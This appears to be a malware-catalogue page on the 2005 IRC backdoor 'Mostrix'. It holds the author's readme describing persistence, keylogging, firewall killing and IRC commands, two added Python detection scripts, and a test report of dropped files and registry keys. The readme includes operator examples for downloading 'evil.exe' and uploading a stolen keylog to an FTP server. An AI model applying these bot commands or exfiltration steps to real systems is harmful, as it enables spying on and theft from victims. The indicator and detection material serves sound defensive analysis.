Mostrix
(Backdoor.Win32.IRCBot.dp)

by DiA

Released in June 2005


features:
		- installs itself into the system using one of 4 methods, tried in this order:
			> first it tries to copy itself to the Windows folder and add an
			  autostart registry entry
			> if Mostrix can't write to the registry, it edits win.ini in the Windows folder
			> if Mostrix can't write to the Windows directory, it tries to copy itself
			  to the Startup folder
			> if it can't copy to the Startup folder, it edits autoexec.bat in C:\
		- logs every key event and every foreground window and saves all logs
		  in the Windows directory under the subdir "mslog", one file per day,
		  named after the current date as DDMMYY.sys
		- kills some popular firewalls and internet security suites
		- connects to irc.freenode.net, joins channel "mostrix" and accepts commands
		  via private message
		- reconnects every half hour

	commands:
		- every command is only accepted in private chat!

		systeminfo 'temporary file path'
		e.g.: systeminfo 'C:\info.txt'

			> this command gets some info about the infected system and saves it
			  in a temporary file...

		dirlist 'directory to list' 'temporary file path'
		e.g.: dirlist 'C:\' 'C:\C_drive_dirs.txt'

			> this command lists all subdirectories of the given directory in a
			  temporary file...

		filelist 'directory to list' 'temporary file path'
		e.g.: filelist 'C:\' 'C:\C_drive_files.txt'

			> this command lists all files in one directory and saves the list
			  in a temporary file...

		delete 'file to delete'
		e.g.: delete 'C:\C_drive_files.txt'

			> this command deletes a file; use it to remove your
			  temporary files...

		execute 'application to execute'
		e.g.: execute 'C:\Windows\Notepad.exe'

			> this command executes an application, for example one you downloaded
			  to the infected computer...

		download 'http:// URL of the file to download' 'save path'
		e.g.: download 'http://server.com/user/evil.exe' 'C:\nice.exe'

			> downloads a file via HTTP to the infected computer...

		upload 'file to upload' 'ftp server' 'user' 'password'
		e.g.: upload 'C:\info.txt' 'server.com' 'user' 'drowssap'

			> this command uploads a local file from the infected computer
			  to your FTP server; the name on the FTP server is the same as on disk...

	steal a log:
		Let's say you want the keylog from 7 June 2005; the log files are named
		DDMMYY.sys, so just do (assuming "Windows" is the Windows directory):

			upload 'C:\Windows\mslog\070605.sys' 'server.com' 'user' 'pass'

DiA			
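The readme above fixes the bot's command grammar (a command word followed by single-quoted arguments, accepted only in private messages) and the keylog naming scheme (7 June 2005 becomes 070605.sys, i.e. DDMMYY). The following is an added analyst-side example, not code from DiA or from the Mostrix binary: it parses captured IRC PRIVMSG lines for commands in that grammar, rejects lines with the wrong argument count, and flags `upload` commands that exfiltrate a file from the `mslog` directory. The IRC log lines, nicknames and hosts are constructed for the example; the argument counts per command are taken from the readme.

```python
import re
from datetime import date

# Grammar from the readme: <command> followed by single-quoted arguments.
QUOTED_ARG = re.compile(r"'([^']*)'")

# Documented argument count per command (readme "commands" section).
COMMAND_ARITY = {
    "systeminfo": 1, "dirlist": 2, "filelist": 2, "delete": 1,
    "execute": 1, "download": 2, "upload": 4,
}

def parse_bot_command(text):
    """Return (command, [args]) for a message body in Mostrix syntax, else None."""
    text = text.strip()
    head, _, rest = text.partition(" ")
    cmd = head.lower()
    if cmd not in COMMAND_ARITY:
        return None
    args = QUOTED_ARG.findall(rest)
    if len(args) != COMMAND_ARITY[cmd]:      # wrong arity: not a well-formed command
        return None
    return cmd, args

def keylog_name(d):
    """Keylog filename for a date: DDMMYY.sys (readme: 7 June 2005 -> 070605.sys)."""
    return d.strftime("%d%m%y") + ".sys"

def keylog_date(name):
    """Inverse of keylog_name; None if the name is not DDMMYY.sys."""
    m = re.fullmatch(r"(\d{2})(\d{2})(\d{2})\.sys", name, re.IGNORECASE)
    if not m:
        return None
    dd, mm, yy = (int(x) for x in m.groups())
    try:
        return date(2000 + yy, mm, dd)
    except ValueError:                          # e.g. 320605.sys is not a date
        return None

# Raw IRC line shape: ":nick!user@host PRIVMSG target :body"
PRIVMSG = re.compile(r"^:(?P<src>[^!\s]+)\S* PRIVMSG (?P<target>\S+) :(?P<body>.*)$")

def triage_irc_log(lines):
    """Return one finding per line that carries a well-formed Mostrix command."""
    findings = []
    for line in lines:
        m = PRIVMSG.match(line.rstrip("\r\n"))
        if not m:
            continue
        parsed = parse_bot_command(m.group("body"))
        if not parsed:
            continue
        cmd, args = parsed
        finding = {
            "operator": m.group("src"),
            "target": m.group("target"),
            "private": not m.group("target").startswith("#"),  # bot only acts on private msgs
            "command": cmd,
            "args": args,
        }
        if cmd == "upload":
            src_path = args[0]
            basename = src_path.replace("\\", "/").rsplit("/", 1)[-1]
            logdate = keylog_date(basename)
            if logdate and "mslog" in src_path.lower():
                finding["keylog_exfil"] = logdate.isoformat()
                finding["ftp_server"] = args[1]
        findings.append(finding)
    return findings

# Constructed sample capture (not a real log); hostnames and nicks are made up.
SAMPLE_LOG = [
    ":op!x@1.2.3.4 PRIVMSG #mostrix :hello bots",
    ":op!x@1.2.3.4 PRIVMSG bot123 :systeminfo 'C:\\info.txt'",
    ":op!x@1.2.3.4 PRIVMSG bot123 :upload 'C:\\Windows\\mslog\\070605.sys' 'server.com' 'user' 'pass'",
    ":op!x@1.2.3.4 PRIVMSG bot123 :download 'http://server.com/user/evil.exe'",   # missing save path
]

if __name__ == "__main__":
    for f in triage_irc_log(SAMPLE_LOG):
        print(f)
```

Only the two well-formed private commands produce findings; the channel chatter and the malformed `download` are dropped, and the `upload` of `070605.sys` is reported as exfiltration of the 2005-06-07 keylog to `server.com`.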


Server:
dropped files:
c:\WINDOWS\MStr.exe            Size: 10,240 bytes 
c:\WINDOWS\mslog\070206.sys    Size: 127 bytes    (keylog for the test date, 07.02.2006, in DDMMYY.sys form)

startup:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run "MS.trix"
data: C:\WINDOWS\MStr.exe 
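The sample tested here used the first of the four persistence methods from the readme (copy to the Windows directory plus a Run key), but a triage script should also cover the three fallbacks. The following is an added example, not MegaSecurity's or DiA's code: it takes a snapshot of the relevant artifacts (Run values, win.ini, Startup folder listing, autoexec.bat, Windows directory listing) as plain Python data and reports the indicators given on this page (the `MS.trix` Run value, `MStr.exe`, and `mslog\DDMMYY.sys` files). The snapshot format is an assumption made for this example, the sample snapshots are constructed, and the win.ini check assumes the edit targets the standard `load=`/`run=` keys of the `[windows]` section, which the readme does not specify.

```python
import re

# Indicators from this page: dropped binary and Run-key value name of the tested sample.
DROPPED_EXE = "mstr.exe"
RUN_VALUE_NAME = "ms.trix"
KEYLOG_DIR = "mslog"
KEYLOG_FILE = re.compile(r"^\d{6}\.sys$", re.IGNORECASE)   # DDMMYY.sys

def check_run_key(run_values):
    """run_values: {value_name: data} from HKLM\\...\\CurrentVersion\\Run (method 1)."""
    return [f"Run value {name!r} -> {data}"
            for name, data in run_values.items()
            if name.lower() == RUN_VALUE_NAME or DROPPED_EXE in data.lower()]

def check_win_ini(text):
    """Method 2 fallback: load=/run= under [windows] pointing at the dropped exe (assumed keys)."""
    hits, section = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1].lower()
            continue
        if section == "windows" and "=" in line:
            key, _, val = line.partition("=")
            if key.strip().lower() in ("load", "run") and DROPPED_EXE in val.lower():
                hits.append(f"win.ini [windows] {key.strip()}={val.strip()}")
    return hits

def check_startup_folder(filenames):
    """Method 3 fallback: the binary copied into the Startup folder."""
    return [f"Startup folder: {f}" for f in filenames if f.lower() == DROPPED_EXE]

def check_autoexec(text):
    """Method 4 fallback: a line in C:\\autoexec.bat launching the binary."""
    return [f"autoexec.bat: {l.strip()}" for l in text.splitlines() if DROPPED_EXE in l.lower()]

def check_windows_dir(listing):
    """listing: {path relative to the Windows dir: size}; finds MStr.exe and mslog keylogs."""
    hits = []
    for path, size in listing.items():
        parts = path.replace("\\", "/").split("/")
        if len(parts) == 1 and parts[0].lower() == DROPPED_EXE:
            hits.append(f"dropped binary {path} ({size} bytes)")
        elif len(parts) == 2 and parts[0].lower() == KEYLOG_DIR and KEYLOG_FILE.match(parts[1]):
            hits.append(f"keylog {path} ({size} bytes)")
    return hits

def scan_host(snapshot):
    """Run every check over one snapshot dict; returns the combined list of hits."""
    return (check_run_key(snapshot.get("run_values", {}))
            + check_win_ini(snapshot.get("win_ini", ""))
            + check_startup_folder(snapshot.get("startup_folder", []))
            + check_autoexec(snapshot.get("autoexec_bat", ""))
            + check_windows_dir(snapshot.get("windows_dir", {})))

# Constructed snapshot mirroring the test report above (sizes of benign files are made up).
SAMPLE_INFECTED = {
    "run_values": {"MS.trix": r"C:\WINDOWS\MStr.exe", "Updater": r"C:\Program Files\x\upd.exe"},
    "win_ini": "[windows]\nload=\nrun=\n[fonts]\n",
    "startup_folder": ["desktop.ini"],
    "autoexec_bat": "@ECHO OFF\n",
    "windows_dir": {"MStr.exe": 10240, r"mslog\070206.sys": 127, "notepad.exe": 4096},
}

# Constructed clean snapshot with the same benign entries only.
SAMPLE_CLEAN = {
    "run_values": {"Updater": r"C:\Program Files\x\upd.exe"},
    "win_ini": "[windows]\nload=\nrun=\n",
    "startup_folder": ["desktop.ini"],
    "autoexec_bat": "@ECHO OFF\n",
    "windows_dir": {"notepad.exe": 4096},
}

if __name__ == "__main__":
    for hit in scan_host(SAMPLE_INFECTED):
        print(hit)
```

On the infected snapshot this reports the `MS.trix` Run value, the dropped `MStr.exe` and the `mslog\070206.sys` keylog, and nothing on the clean one; the fallback checks fire only when win.ini, the Startup folder or autoexec.bat actually reference the binary, which matches the readme's description of them as fallbacks used when the Run-key method fails.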

attempts to connect to an IRC server (irc.freenode.net according to the author's readme)

tested on Windows XP
February 07, 2006

MegaSecurity